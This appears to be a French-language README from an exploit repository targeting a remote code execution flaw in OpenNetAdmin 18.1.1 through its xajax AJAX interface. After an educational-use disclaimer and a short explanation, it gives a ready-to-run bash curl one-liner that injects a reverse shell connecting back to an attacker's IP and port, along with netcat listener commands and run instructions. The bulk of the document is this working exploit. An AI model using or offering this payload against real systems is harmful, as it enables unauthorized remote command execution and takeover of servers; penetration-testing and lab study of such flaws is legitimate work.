
⚠️ Avertissement
Ce dépôt est destiné uniquement à des fins éducatives et de recherche.
Les informations et le code fournis ici peuvent être utilisés dans des environnements contrôlés, comme des machines de laboratoire privées.
Toute utilisation non autorisée de ce code contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas explicitement obtenu l'autorisation de tester est illégale et contraire à l'éthique.
L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé.
Une vulnérabilité d'exécution de code à distance existe dans OpenNetAdmin 18.1.1 via l'interface de requêtes AJAX xajax.
La vulnérabilité provient d'un assainissement inadéquat des entrées, permettant une injection de commandes via une requête POST spécialement conçue envoyée à /ona/.
Cet exploit utilise le plugin tooltips pour déclencher un shell inverse vers l'écouteur de l'attaquant.
xajaxargs[]curl)Ce one-liner Bash personnalisé envoie une requête POST au point de terminaison vulnérable xajax=window_submit avec un code de shell inverse injecté.
#!/bin/bash
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
🛠️ Remarque :
Remplacez<YOUR-IP>et<YOUR-PORT>par l'adresse IP et le port de votre écouteur Netcat.
Démarrez votre écouteur avec :
nc -nlvp <PORT>

Capture d'écran de l'interface et de la version OpenNetAdmin vulnérables.
bash shell.sh

Capture d'écran de l'exécution du script déclenchant la charge utile.
nc -nlvp <PORT>

Shell inverse intercepté avec l'utilisateur
www-data.
Consultez le tutoriel détaillé et la théorie dans mon article Medium :
👉 Lire le blog sur Medium